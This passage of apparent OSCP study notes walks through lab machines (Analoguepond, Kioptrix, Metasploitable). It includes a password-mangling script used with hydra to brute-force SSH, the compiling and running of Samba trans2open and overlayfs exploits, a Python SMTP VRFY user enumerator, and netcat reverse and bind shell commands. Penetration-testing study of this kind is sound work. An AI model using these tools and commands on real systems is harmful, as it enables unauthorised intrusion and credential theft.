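]

# Simple leet substitution table (a->4, e->3, i->1, o->0, s->5).
LEET = str.maketrans("aeios", "43105")

# Common appendices people add to a word to satisfy a password policy.
SUFFIXES = ("1", "123", "!", "2021")


def _dedupe(items):
    """Keep the first occurrence of each item, preserving order, so output is deterministic."""
    return list(dict.fromkeys(items))


def mangle(seed):
    """Apply a small john-style rule set to one multi-word seed.

    Word-joining rules first (no separator, space, underscore, dash, CamelCase),
    then per-base rules: as-is, UPPER, Capitalised, leet, and each suffix.
    """
    words = seed.lower().split()
    bases = _dedupe([
        "".join(words),                             # therisingsun
        " ".join(words),                            # the rising sun
        "_".join(words),                            # the_rising_sun
        "-".join(words),                            # the-rising-sun
        "".join(w.capitalize() for w in words),     # TheRisingSun
    ])
    out = []
    for b in bases:
        out.extend([b, b.upper(), b.capitalize(), b.translate(LEET)])
        out.extend(b + s for s in SUFFIXES)
    return _dedupe(out)


def generate(seeds=SEEDS):
    """Candidate list for all seeds; the same idea as `john --wordlist=... --rules --stdout`."""
    out = []
    for seed in seeds:
        out.extend(mangle(seed))
    return _dedupe(out)


def write_wordlist(path, seeds=SEEDS):
    """Write one candidate per line, ready for `hydra -P path ...`; returns the count."""
    cands = generate(seeds)
    with open(path, "w", encoding="utf-8") as fh:
        fh.write("\n".join(cands) + "\n")
    return len(cands)


if __name__ == "__main__":
    print(f"{write_wordlist('passcandi')} candidates written to passcandi")
```

Keep the seed list short and the rules targeted: hydra against ssh is slow (see the -t 4 warning below), so a few hundred well-chosen candidates beat rockyou here.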

then use hydra to crack

$ hydra -P passcandi -l eric 192.168.119.133 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-10 22:24:48
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 156 login tries (l:1/p:156), ~10 tries per task
[DATA] attacking ssh://192.168.119.133:22/
[22][ssh] host: 192.168.119.133 login: eric password: therisingsun
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-10 22:24:51

-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE

Found password: therisingsun

ssh eric@192.168.119.133
eric@analoguepond:~$ sudo -v
sudo: unable to resolve host analoguepond
Sorry, user eric may not run sudo on analoguepond.

eric is not allowed to sudo

eric@analoguepond:~$ uname -a
Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

searchsploit ubuntu 14.04
found:
'overlayfs' Local Privilege Escalation

https://www.exploit-db.com/exploits/39166

compile and run it on the box to get root

root@analoguepond:~# cd /root/
root@analoguepond:/root# ls
flag.txt
root@analoguepond:/root# cat flag.txt
C'Mon Man! Y'all didn't think this was the final flag so soon...?

Did the bright lights and big city knock you out...? If you pull
a stunt like this again, I'll send you back to Walker...

This is obviously troll flah #1 So keep going.

root@analoguepond:/root# netstat -nplt
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 192.168.122.1:53 0.0.0.0:* LISTEN 1231/dnsmasq
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 918/sshd
tcp6 0 0 :::22 :::* LISTEN 918/sshd

netstat - Print network connections, routing tables, interface
statistics, masquerade connections, and multicast memberships

-n, --numeric don't resolve names
-p, --programs display PID/Program name for sockets
-l, --listening display listening server sockets
{-t|--tcp} {-u|--udp} {-w|--raw} {-x|--unix}

ifconfig
virbr0 Link encap:Ethernet HWaddr 52:54:00:b2:23:25
inet addr:192.168.122.1 Bcast:192.168.122.255 Mask:255.255.255.0

could run a ping-sweep script from the victim to find hosts on 192.168.122.0/24 (virbr0 with dnsmasq on 192.168.122.1 is the libvirt default network, so the box probably hosts its own VMs)

there's something else here, but let's end it, since my aim is to learn SNMP…

SMTP

telnet 192.168.119.129 25
220 metasploitable.localdomain ESMTP Postfix (Ubuntu)

vrfy admin@metasploitable.localdomain
550 5.1.1 <admin@metasploitable.localdomain>: Recipient address rejected: User unknown in local recipient table
vrfy msfadmin@metasploitable.localdomain
252 2.0.0 msfadmin@metasploitable.localdomain

VRFY checks whether a user exists: 252 (or 250) means the server knows the mailbox, 550 means it does not

Metasploit:

use auxiliary/scanner/smtp/smtp_enum

Description:
The SMTP service has two internal commands that allow the
enumeration of users: VRFY (confirming the names of valid users) and
EXPN (which reveals the actual address of users aliases and lists of
e-mail (mailing lists)). Through the implementation of these SMTP
commands can reveal a list of valid users.

[+] 192.168.119.129:25 - 192.168.119.129:25 Users found: , backup, bin, daemon, distccd, ftp, games, gnats, irc, libuuid, list, lp, mail, man, mysql, news, nobody, postfix, postgres, postmaster, proxy, service, sshd, sync, sys,

Use smtp-user-enum

$ /usr/share/legion/scripts/smtp-user-enum.pl -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t 192.168.119.129
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

----------------------------------------------------------
| Scan Information |
----------------------------------------------------------

Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... /usr/share/wordlists/metasploit/unix_users.txt
Target count ............. 1
Username count ........... 168
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............

######## Scan started at Wed Mar 10 21:16:31 2021 #########
192.168.119.129: backup exists
192.168.119.129: bin exists
192.168.119.129: daemon exists
192.168.119.129: distccd exists
192.168.119.129: ftp exists
192.168.119.129: games exists
192.168.119.129: gnats exists
192.168.119.129: irc exists
192.168.119.129: libuuid exists
192.168.119.129: list exists
192.168.119.129: lp exists
192.168.119.129: mail exists
192.168.119.129: man exists
192.168.119.129: mysql exists
192.168.119.129: news exists
192.168.119.129: nobody exists
192.168.119.129: postfix exists
192.168.119.129: postgres exists
192.168.119.129: postmaster exists
192.168.119.129: proxy exists
192.168.119.129: root exists
192.168.119.129: ROOT exists
192.168.119.129: service exists
192.168.119.129: sshd exists
192.168.119.129: sync exists
192.168.119.129: sys exists
192.168.119.129: syslog exists
192.168.119.129: user exists
192.168.119.129: uucp exists
192.168.119.129: www-data exists
######## Scan completed at Wed Mar 10 21:16:32 2021 #########
30 results.

168 queries in 1 seconds (168.0 queries / sec)

add -D metasploitable.localdomain to VRFY full addresses (user@domain) instead of bare usernames; some MTAs only answer for the fully qualified form

192.168.119.129: mysql@metasploitable.localdomain exists
192.168.119.129: news@metasploitable.localdomain exists
192.168.119.129: nobody@metasploitable.localdomain exists
192.168.119.129: postfix@metasploitable.localdomain exists
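
The VRFY exchange described above, as an added Python example (not part of the original notes, and not smtp-user-enum's code): a small enumerator that sends one VRFY per candidate over a single SMTP session and treats 250/252 as "exists" and 550 as "unknown", plus an embedded fake Postfix-style responder so it runs offline. The fake server's banner and user list are constructed, not Metasploitable's; the candidate list is mine.

```python
import socket
import threading

# Constructed account list for the embedded fake server (not Metasploitable's real one).
FAKE_VALID_USERS = {"root", "msfadmin", "postfix", "www-data"}
FAKE_BANNER = b"220 metasploitable.localdomain ESMTP Postfix (Ubuntu)\r\n"


def _handle(conn):
    """Answer one client Postfix-style: VRFY -> 252 if the local part exists, else 550."""
    conn.sendall(FAKE_BANNER)
    buf = b""
    while True:
        data = conn.recv(1024)
        if not data:
            return
        buf += data
        while b"\r\n" in buf:
            line, buf = buf.split(b"\r\n", 1)
            cmd, _, arg = line.decode(errors="replace").partition(" ")
            if cmd.upper() == "VRFY":
                local = arg.strip("<>").split("@", 1)[0]
                if local in FAKE_VALID_USERS:
                    conn.sendall(f"252 2.0.0 {arg}\r\n".encode())
                else:
                    conn.sendall(f"550 5.1.1 <{arg}>: Recipient address rejected: "
                                 f"User unknown in local recipient table\r\n".encode())
            elif cmd.upper() == "QUIT":
                conn.sendall(b"221 2.0.0 Bye\r\n")
                return
            else:
                conn.sendall(b"502 5.5.2 Error: command not recognized\r\n")


def _serve(srv):
    """Accept loop for the fake server; ends when the listening socket is closed."""
    while True:
        try:
            conn, _ = srv.accept()
        except OSError:
            return
        with conn:
            _handle(conn)


def vrfy_enum(host, port, candidates, domain=None, timeout=5):
    """Enumerate users over one SMTP session with VRFY (what smtp-user-enum -M VRFY does).

    250/252 means the server recognises the mailbox, 550 means unknown, and a 502
    means VRFY is disabled, in which case fall back to EXPN or RCPT TO.
    """
    found = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        f = s.makefile("rb")
        line = f.readline().decode(errors="replace")
        if not line.startswith("220"):
            raise RuntimeError(f"unexpected greeting: {line!r}")
        while line[3:4] == "-":          # skip the rest of a multi-line greeting
            line = f.readline().decode(errors="replace")
        for user in candidates:
            target = f"{user}@{domain}" if domain else user
            s.sendall(f"VRFY {target}\r\n".encode())
            code = f.readline().decode(errors="replace")[:3]
            if code == "502":
                raise RuntimeError("VRFY is disabled on this server")
            if code in ("250", "252"):
                found.append(target)
        s.sendall(b"QUIT\r\n")
    return found


def demo():
    """Run the enumerator against the embedded fake server on an ephemeral loopback port."""
    srv = socket.socket()
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    port = srv.getsockname()[1]
    threading.Thread(target=_serve, args=(srv,), daemon=True).start()
    candidates = ["root", "admin", "msfadmin", "postfix", "www-data", "nobody"]
    try:
        users = vrfy_enum("127.0.0.1", port, candidates)
        emails = vrfy_enum("127.0.0.1", port, candidates, domain="metasploitable.localdomain")
    finally:
        srv.close()
    return users, emails


if __name__ == "__main__":
    print(demo())
```

Against a real target call `vrfy_enum("192.168.119.129", 25, wordlist)`; one connection for the whole list is both faster and quieter than smtp-user-enum's five worker processes, and the 502 check stops you early when the MTA has `disable_vrfy_command = yes`.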

Netcat

nc -nv 192.168.0.22 80

-n numeric-only IP addresses, no DNS
-v verbose [use twice to be more verbose]

Reverse shell: if the victim runs this, it connects to the attacker's listening nc and hands over a shell

nc -nv attackerIP port -e /bin/bash

Listening

Bind shell: the victim listens on a port and whoever connects to it gets the shell

nc -nvlp 4444 -e /bin/bash

-l listening
-p port
-e filename program to exec after connect [dangerous!!]

-e only exists in the traditional netcat (nc.traditional) and in ncat (--exec / --sh-exec); the OpenBSD nc shipped on most modern distros does not have it, which is when the mkfifo pipe trick or a python/perl one-liner is needed


Kioptrix Level 1 Walkthrough

Find IP Address of target Box

check current interface:

# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.119.130 netmask 255.255.255.0 broadcast 192.168.119.255
inet6 fe80::20c:29ff:fec4:f034 prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:c4:f0:34 txqueuelen 1000 (Ethernet)
RX packets 184146 bytes 51512617 (49.1 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 167933 bytes 11553532 (11.0 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

interface is eth0

netdiscover

Using ARP messages to discover hosts

1
netdiscover -i eth0 

-i device: your network device (interface)

[screenshot: netdiscover output]

So the target IP address is 192.168.119.254

Port Scan

first Scan

nmap -Pn -sS --stats-every 3m --max-scan-delay 20 --max-retries 1 --defeat-rst-ratelimit -p1-65535 -oN ~/kiotrix1.txt 192.168.119.254

--max-scan-delay 20 caps the delay Nmap adds between probes when it detects rate limiting or dropped packets, so the scan cannot slow to a crawl

--defeat-rst-ratelimit
Many hosts have long used rate limiting to reduce the number of ICMP error messages (such as
port-unreachable errors) they send. Some systems now apply similar rate limits to the RST (reset)
packets they generate. This can slow Nmap down dramatically as it adjusts its timing to reflect those
rate limits. You can tell Nmap to ignore those rate limits (for port scans such as SYN scan which don't
treat non-responsive ports as open) by specifying --defeat-rst-ratelimit.

Using this option can reduce accuracy, as some ports will appear non-responsive because Nmap didn't
wait long enough for a rate-limited RST response. With a SYN scan, the non-response results in the port
being labeled filtered rather than the closed state we see when RST packets are received. This option
is useful when you only care about open ports, and distinguishing between closed and filtered ports
isn't worth the extra time.

The port identifiers are unsigned 16-bit integers, meaning that the largest number you can put in there is 2^16-1 = 65535

Result: All 65535 scanned ports on 192.168.119.254 are filtered

Issue

192.168.119.254 is not the IP address of the Kioptrix box. I encountered a problem: Kioptrix cannot be set to use NAT or Host-only mode. It automatically switches to Bridged (Automatic) when launching. So weird. Link: network setting automatically switched to Bridged in VMWare Player

I will stick with bridged mode for now; it is not safe, btw.

So the IP address of target Box is 192.168.0.22

First Scan continue

nmap -sS -n -Pn -p- -T4 192.168.0.22

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
443/tcp open https
1024/tcp open kdm

Second Scan

nmap -Pn -nvv -sSV -p 22,80,111,139,443,1024 --version-intensity 9 -A -oN ~/kioptrix1-services.txt 192.168.0.22

-n/-R: Never do DNS resolution/Always resolve [default: sometimes]
--version-intensity <level>: Set from 0 (light) to 9 (try all probes)
-sSV combines -sS and -sV: SYN scan plus service/version detection
-oN takes a file name, which must come before the target (the file name here is illustrative)

Some Notes

interesting: 80 and 443 (web server), tcp 139 (Samba)

SMB: a communication protocol for providing shared access to files, printers, and serial ports between nodes on a network

1
2
3
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33

UDP Scan

nmap --top-ports 1000 -sU -Pn --stats-every 3m --max-retries 1 -T3 192.168.0.22

SSH enumeration

openssh version: OpenSSH 2.9p2
Google it: there are code-execution overflows such as CVE-2002-0640
that one only applies when sshd is built with PAM and uses keyboard-interactive authentication (PAMAuthenticationViaKbdInt), so check the server's configuration before spending time on it

searchsploit openssh

Try directly connect to it:

ssh 192.168.0.22
Unable to negotiate with 192.168.0.22 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1

# so use one of the exchange method and try again
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 192.168.0.22

Unable to negotiate with 192.168.0.22 port 22: no matching cipher found. Their offer: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes192-cbc,aes256-cbc,rijndael128-cbc,rijndael192-cbc,rijndael256-cbc,rijndael-cbc@lysator.liu.se

# then add the cipher
ssh -c aes128-cbc -oKexAlgorithms=+diffie-hellman-group1-sha1 192.168.0.22
root@192.168.0.22's password:

Password attacks are the last resort: easily detected if there is logging
Usually SSH is not the first thing to try

HTTP Enumeration

port 80 and 443

  • go to the web page in a browser
  • view the source code
  • check out https:// as well (it may serve different content, and the certificate can leak hostnames)

Directory Scan

dirbuster

some wordlists are stored in /usr/share/wordlists/dirbuster
Also download some bigger wordlists: google dirbuster wordlist
I actually did not find it through Google; it's in the GitHub repo https://github.com/digination/dirbuster-ng

remove "manual" from the wordlist; there are many PHP manual pages, a waste of time, but let me try
[screenshot: dirbuster results]

nothing interesting

nikto -h 192.168.0.22

-h -host

---------------------------------------------------------------------------
+ Target IP: 192.168.0.22
+ Target Hostname: 192.168.0.22
+ Target Port: 80
+ Start Time: 2021-03-09 21:53:34 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ Server may leak inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Wed Sep 5 23:12:46 2001
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OpenSSL/0.9.6b appears to be outdated (current is at least 1.1.1). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OSVDB-27487: Apache is vulnerable to XSS via the Expect header
+ Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-838: Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392.
+ OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ OSVDB-682: /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS).
+ OSVDB-3268: /manual/: Directory indexing found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /test.php: This might be interesting...
+ /wp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /assets/mobirise/css/meta.php?filesrc=: A PHP backdoor file manager was found.
+ /login.cgi?cli=aa%20aa%27cat%20/etc/hosts: Some D-Link router remote command execution.
+ /shell?cat+/etc/hosts: A backdoor was identified.
+ 8724 requests: 0 error(s) and 30 item(s) reported on remote host
+ End Time: 2021-03-09 21:53:58 (GMT-5) (24 seconds)
---------------------------------------------------------------------------

If PUT or DELETE were allowed that would be interesting (PUT can upload a web shell). Also, most of the "backdoor file manager" and D-Link hits above are generic nikto signatures matching on response codes; request each URL yourself before believing any of them

scan for https: nikto -h 192.168.0.22:443

SMB Enumeration

add some smb configuration to /etc/samba/smb.conf

[global]
client use spnego = no
client ntlmv2 auth = no

deprecated settings, but they are what make a modern smbclient talk to Samba 2.2.x: that server has neither extended security (SPNEGO) nor NTLMv2, so the client must be told to fall back (see the "Server does not support EXTENDED_SECURITY" warning from smbclient below)

SPNEGO is used when a client application wants to authenticate to a remote server, but neither end is sure what authentication protocols the other supports.

not sure why I need those

enum4linux 192.168.0.22

Enum4linux is a tool for enumerating information from Windows and Samba systems. It attempts to offer similar functionality to enum.exe formerly available from www.bindview.com.

=====================================
| Session Check on 192.168.0.22 |
=====================================
[E] Server doesn't allow session using username '', password ''. Aborting remainder of tests.

resolve the issue by adding this to smb.conf:

client min protocol = NT1

======================================
| OS information on 192.168.0.22 |
======================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 192.168.0.22 from smbclient:
[+] Got OS info for 192.168.0.22 from srvinfo:
KIOPTRIX Wk Sv PrQ Unx NT SNT Samba Server
platform_id : 500
os version : 4.5
server type : 0x9a03

use metasploit to detect smb version

use auxiliary/scanner/smb/smb_version
set rhosts 192.168.0.22
show options
exploit

samba version is Samba 2.2.1a

searchsploit samba 2.2
----------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------- ---------------------------------
Samba 2.0.x/2.2 - Arbitrary File Creation | unix/remote/20968.txt
Samba 2.2.0 < 2.2.8 (OSX) - trans2open Overflow (Metasploit) | osx/remote/9924.rb
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (1) | unix/remote/22468.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (2) | unix/remote/22469.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (3) | unix/remote/22470.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (4) | unix/remote/22471.txt
Samba 2.2.x - 'nttrans' Remote Overflow (Metasploit) | linux/remote/9936.rb
Samba 2.2.x - CIFS/9000 Server A.01.x Packet Assembling Buffer Overflow | unix/remote/22356.c
Samba 2.2.x - Remote Buffer Overflow | linux/remote/7.pl
---------------------------------------------------------------------------------- ---------------------------------

go to https://www.exploit-db.com/search and search for trans2open

Tried some exploits; https://www.exploit-db.com/exploits/22469 is the one that works, and I successfully got the shell

# compile first: gcc 22469.c -o 22469
./22469 -t 192.168.0.22

[screenshot: shell from the trans2open exploit]

Nbtscan

nbtscan 192.168.0.22
Doing NBT name scan for addresses from 192.168.0.22

IP address NetBIOS Name Server User MAC address
------------------------------------------------------------------------------
192.168.0.22 KIOPTRIX <server> KIOPTRIX 00:00:00:00:00:00

Resolve the host name

NetBIOS over TCP/IP (NBT, or sometimes NetBT) is a networking protocol that allows legacy computer applications relying on the NetBIOS API to be used on modern TCP/IP networks.

On Windows, SMB can run directly over TCP/IP without the need for NetBIOS over TCP/IP. This will use, as you point out, port 445.

Generally speaking, on other systems, you’ll find services and applications using port 139. This, basically speaking, means that SMB is running with NetBIOS over TCP/IP, where, stack-wise, SMB is on top of NetBIOS if you are to imagine it with the OSI model.

SMB does rely on NetBIOS for communication with devices that do not support direct hosting of SMB over TCP/IP.

NetBIOS is completely independent from SMB. It is an API that SMB, and other technologies can use, so NetBIOS has no dependency to SMB.

https://superuser.com/questions/694469/difference-between-netbios-and-smb

smbclient

smbclient -L 192.168.0.22
Enter WORKGROUP\root's password:

Sharename Type Comment
--------- ---- -------
IPC$ IPC IPC Service (Samba Server)
ADMIN$ IPC IPC Service (Samba Server)
Reconnecting with SMB1 for workgroup listing.
Server does not support EXTENDED_SECURITY but 'client use spnego = yes' and 'client ntlmv2 auth = yes' is set
Anonymous login successful

Server Comment
--------- -------
KIOPTRIX Samba Server

Workgroup Master
--------- -------
HIRON INTEL_CE_LINUX
MYGROUP KIOPTRIX

-L, --list=HOST: list the shares available on HOST. Add -N (--no-pass) to skip the password prompt and try the anonymous (null) session directly; the "Anonymous login successful" line above is what you want to see.

smbclient "\\\192.168.0.22\IPC$"

If smbclient reports "Not enough '\' characters in service", the shell swallowed the backslashes: add more of them (as above), or use forward slashes (smbclient //192.168.0.22/IPC$), which need no escaping at all.

Notes

could also try nmap with smb scripts

nmap --script "smb-*" 192.168.0.22

OSCP Study Notes - 2021/03/07

TRY HARDER!!

Metasploit Setup

Requirements: METASPLOIT UNLEASHED REQUIREMENTS

Hypervisor Setup

Return keyboard and mouse control to the host: Ctrl+Alt

Kali Linux

  • RAM: 2GB
  • Disk 10GB
  • Username: gavin
  • PasswordTip: [cc6]
  • Update Metasploit: apt update && apt upgrade

MetaSploitable:

  • RAM: 512MB
  • login: msfadmin:msfadmin

Metasploit Filesystem and Libraries

Link: METASPLOIT FILESYSTEM AND LIBRARIES
Installed in Kali Linux by default
package path: /usr/share/metasploit-framework
subdirectories: data/documentation/lib/modules/plugins/scripts/tools

Two Module Locations:

  • Primary Modules: /usr/share/metasploit-framework/modules/
  • Custom Modules: ~/.msf4/modules/

Modules

  • Exploits: exploit modules are defined as modules that use payloads
  • Auxiliary: Auxiliary modules include port scanners, fuzzers, sniffers, and more.
  • Payloads, Encoders, Nops: Payloads consist of code that runs remotely, while encoders ensure that payloads make it to their destination intact. Nops keep the payload sizes consistent across exploit attempts.

Metasploit Fundamentals

Payload Type

Singles

Singles are payloads that are self-contained and completely standalone. A Single payload can be something as simple as adding a user to the target system or running calc.exe

Stagers

Stagers set up a network connection between the attacker and victim and are designed to be small and reliable. It is difficult to always do both of these well, so the result is multiple similar stagers. Metasploit will use the best one when it can and fall back to a less-preferred one when necessary.

Stages

Stages are payload components that are downloaded by Stagers modules. The various payload stages provide advanced features with no size limits such as Meterpreter, VNC Injection, and the iPhone ‘ipwn’ Shell.

CommandLine Refresher

pwd, man, ls, cd, mkdir, rmdir, cp, mv, locate(find file), adduser, su, sudo, echo, cat, nano, chmod, ifconfig, ping

adduser bob creates the user bob; adduser bob sudo then adds the existing user bob to the sudo group (i.e. makes bob a sudo user). Two commands, not one.

Kali Services:

http, ssh, postgresql

http

service apache2 start
systemctl enable apache2
service apache2 stop

netstat

netstat -antp
-a, --all display all sockets (default: connected)
-n, --numeric don't resolve names
-t, --tcp
-p, --programs display PID/Program name for sockets (needs root to show processes owned by other users)

postgresql

Starting postgresql lets msfconsole use its database, which is supposed to make module searches faster (I could not feel the difference).

Bash Scripting

ping -c 1 192.168.119.2 | grep "64 bytes" | cut -d " " -f 4 | sed 's/.$//'
-d, –delimiter=DELIM use DELIM instead of TAB for field delimiter
-f, –fields=LIST select only these fields; also print any line that contains no delimiter character, unless the -s option is specified

sed 's/.$//'
In sed, "." matches any single character and "$" anchors to the end of the line, so s/.$// deletes only the last character: the trailing colon that cut leaves after the address (e.g. "192.168.119.2:" becomes "192.168.119.2").

ping all responed IP in the network:

#!/bin/bash
if [ "$1" == "" ] # space after [
then
echo "Usage: ./pingsweep.sh [network]"
echo "Example: ./pingsweep.sh 192.168.119"
else
for ip in `seq 1 254`; do
ping -c 1 -W 1 $1.$ip | grep "64 bytes" \
| cut -d " " -f 4 | sed 's/.$//' &
done
wait # wait for the backgrounded pings; without this the script exits before they finish
fi

./pingsweep.sh 192.168.119 > iplist.txt
cat iplist.txt | sort -u

-u show only unique results

1
for ip in $(cat iplist.txt); do nmap -Pn $ip; done

nmap:
-Pn: Treat all hosts as online – skip host discovery

Information Gathering

Tools:

Google, Exploit-DB, Google Hacking DB, WHOIS, Netcraft, theharvester

Google

site:cnn.com -site:www.cnn.com filetype:pdf
Shodan: search engine for devices connected to the internet (https://www.shodan.io)

Netcraft

Search web by domain https://searchdns.netcraft.com/ *.cnn.com

Whois

Look up domain registration information: whois cnn.com

theHarvester

theHarvester -d cnn.com -b google -l 200
-d domain
-b datasource (e.g. bing, linkedin, google)
-l limit the number of results

Banner grabbing: nc -nv xxx.xxx.xxx.xxx <port>
-n numeric-only IP addresses, no DNS
-v verbose [use twice to be more verbose]

Scanning with nmap

Ping sweep; not fully accurate: expect false positives, and hosts that drop the probes are missed entirely.

nmap -sn 192.168.119.1-254
nmap -sn 192.168.119.0/24

-sn: Ping Scan - disable port scan

nmap -vv -Pn -A -sS -T4 -p- -oN tcpscan.txt 192.168.119.129

-A: Enable OS detection, version detection, script scanning, and traceroute
-sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
-sS is a half-open scan: send SYN, receive SYN/ACK, then answer with RST instead of the final ACK. The handshake never completes, so most applications never log the connection (firewalls and IDS still see the SYN). Needs root; -sT is the unprivileged fallback.
-T<0-5>: Set timing template (higher is faster). Higher templates are noisier and more likely to be detected; in the real world -T4 seems fine.
-p <port ranges>: Only scan specified ports
Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080,S:9
-p- (all)
-oN/-oX/-oS/-oG <file>: Output scan in normal, XML, s|<rIptkIddi3,and Grepable format, respectively, to the given filename.

Speedup tips: quickly scan for open ports, then do -A on open ports to gather more info

UDP scan

nmap -vv -Pn -A -sU -T4 --top-ports 200 -oN udpscan.txt 192.168.119.129

–top-ports <number>: Scan <number> most common ports

Again, two stage scans, very useful, save time
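The two-stage approach from the speed-up tip above, as an added example (not code from these notes): a fast full-range sweep with grepable output, then -A only on the ports that came back open. open_ports and port_arg are my helper names, SAMPLE_GNMAP is constructed -oG output rather than a real scan, and two_stage assumes nmap is on PATH and the target is given as an IP (nmap's Host: line is keyed by address).

```python
"""Two-stage nmap: sweep all TCP ports fast, then run -A only on open ones.

Added example, not from the notes. SAMPLE_GNMAP is constructed -oG output,
not a real scan result.
"""
import re
import subprocess

SAMPLE_GNMAP = """# Nmap 7.91 scan initiated as: nmap -Pn -sS -T4 -p- -oG - 192.168.119.129
Host: 192.168.119.129 ()\tStatus: Up
Host: 192.168.119.129 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 139/open/tcp//netbios-ssn///, 445/filtered/tcp//microsoft-ds///\tIgnored State: closed (65531)
# Nmap done -- 1 IP address (1 host up) scanned in 12.34 seconds
"""

# port/state/protocol triples as they appear in the grepable "Ports:" field
PORT_RE = re.compile(r"(\d+)/(open\|filtered|open|filtered|closed)/(tcp|udp)")


def open_ports(gnmap: str) -> dict:
    """host -> sorted open port numbers. Only 'open' qualifies: 'filtered'
    and 'open|filtered' (common for UDP) need a second look, not -A."""
    found = {}
    for line in gnmap.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        for port, state, _proto in PORT_RE.findall(field):
            if state == "open":
                found.setdefault(host, set()).add(int(port))
    return {h: sorted(p) for h, p in found.items()}


def port_arg(ports) -> str:
    """Collapse [22, 80, 139, 140, 141] into '22,80,139-141' for -p."""
    ports = sorted(set(ports))
    if not ports:
        return ""
    ranges, start, prev = [], ports[0], ports[0]
    for p in ports[1:]:
        if p != prev + 1:
            ranges.append((start, prev))
            start = p
        prev = p
    ranges.append((start, prev))
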